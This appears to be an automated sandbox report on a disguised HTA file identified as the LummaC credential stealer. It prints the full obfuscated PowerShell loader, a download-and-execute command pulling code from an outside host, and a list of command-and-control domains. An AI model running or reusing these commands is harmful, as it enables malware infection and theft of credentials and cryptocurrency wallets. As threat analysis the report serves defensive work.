Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Winter.mp4.hta

Overview

General Information

Sample name:Winter.mp4.hta
Analysis ID:1581902
MD5:dd408ffa842e697a71fa466966538cb4
SHA1:2eeb41877f0eae3ea95de8981684955111f26255
SHA256:84b473ab26ef4382c0ad60ad93b780e0564245f9b1fffe28a3248b0c7d2470cd
Tags:EmmenhtalFakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 2000 cmdline: mshta.exe "C:\Users\user\Desktop\Winter.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 6624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF222AD4A4FCB003B17174060EB5530CE7B9E694D54704BBE85697431BEF0DF8FB39514E546913E627324B7912AABC2519CDC16270DB9302DBA4235A5922582F6D19012A6A61A182460E5328B98785BBCA6DC1EE54C29B492DD0169BBDF0AD22735B4539FAB41765D2C78D6094D4933B0B9AB21F2194145068591FA2819F5844A17C9B3FE88007ABFFD555866F7C9BF9A7AE7857BD7D50BB0B679FDB641E588F7BA6998B1E09201B6E7429AAF1B53408F5BB85F586C567D650066E38E837E6F9B238A1169DAF40AC32351DE3006C93F4A0AC7408E46D98D725B1062464B5E6E747BE24FBD1B7DFEFCFDCA53481D894F0A6D7A6DF2DBAE5990233F3B5DD4A1DBC0E0C606F80172B012B5490EF0B0CC77328D4A2E0767896493EA713FDF1226247FDBEA1DA14AADF2D96D9AB01E6D4547C26AE');$CsiZ=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((rOnH('507A6B6D525573745374576441776A59')),[byte[]]::new(16)).TransformFinalBlock($hcNM,0,$hcNM.Length)); & $CsiZ.Substring(0,3) $CsiZ.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7464 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7448 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rebuildeso.buzz", "crackerdolk.click", "hummskitnj.buzz", "appliacnesot.buzz", "cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "prisonyfork.buzz", "screwamusresz.buzz"], "Build id": "jMw1IE--bigJ"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 6624JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 6624INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x170c78:$b1: ::WriteAllBytes(
        • 0x17160f:$b1: ::WriteAllBytes(
        • 0x966f:$s1: -join
        • 0xa552:$s1: -join
        • 0x18cb1:$s1: -join
        • 0x3f3a7:$s1: -join
        • 0x40293:$s1: -join
        • 0x413c5:$s1: -join
        • 0x44d1b:$s1: -join
        • 0x6345f:$s1: -join
        • 0x63615:$s1: -join
        • 0x8a4c3:$s1: -join
        • 0x97598:$s1: -join
        • 0x9a96a:$s1: -join
        • 0x9b01c:$s1: -join
        • 0x9cb0d:$s1: -join
        • 0x9ed13:$s1: -join
        • 0x9f53a:$s1: -join
        • 0x9fdaa:$s1: -join
        • 0xa04e5:$s1: -join
        • 0xa0517:$s1: -join
        Process Memory Space: powershell.exe PID: 7464JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 7464INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xcd97eb:$b2: ::FromBase64String(
          • 0x6dfac9:$s1: -join
          • 0x6ecb9e:$s1: -join
          • 0x6eff70:$s1: -join
          • 0x6f0622:$s1: -join
          • 0x6f2113:$s1: -join
          • 0x6f4319:$s1: -join
          • 0x6f4b40:$s1: -join
          • 0x6f53b0:$s1: -join
          • 0x6f5aeb:$s1: -join
          • 0x6f5b1d:$s1: -join
          • 0x6f5b65:$s1: -join
          • 0x6f5b84:$s1: -join
          • 0x6f63d4:$s1: -join
          • 0x6f6550:$s1: -join
          • 0x6f65c8:$s1: -join
          • 0x6f665b:$s1: -join
          • 0x6f68c1:$s1: -join
          • 0x6f8a57:$s1: -join
          • 0x7074a1:$s1: -join
          • 0x71cbe9:$s1: -join
          Process Memory Space: powershell.exe PID: 7448JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            amsi32_6624.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7464.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF2
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF2
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = 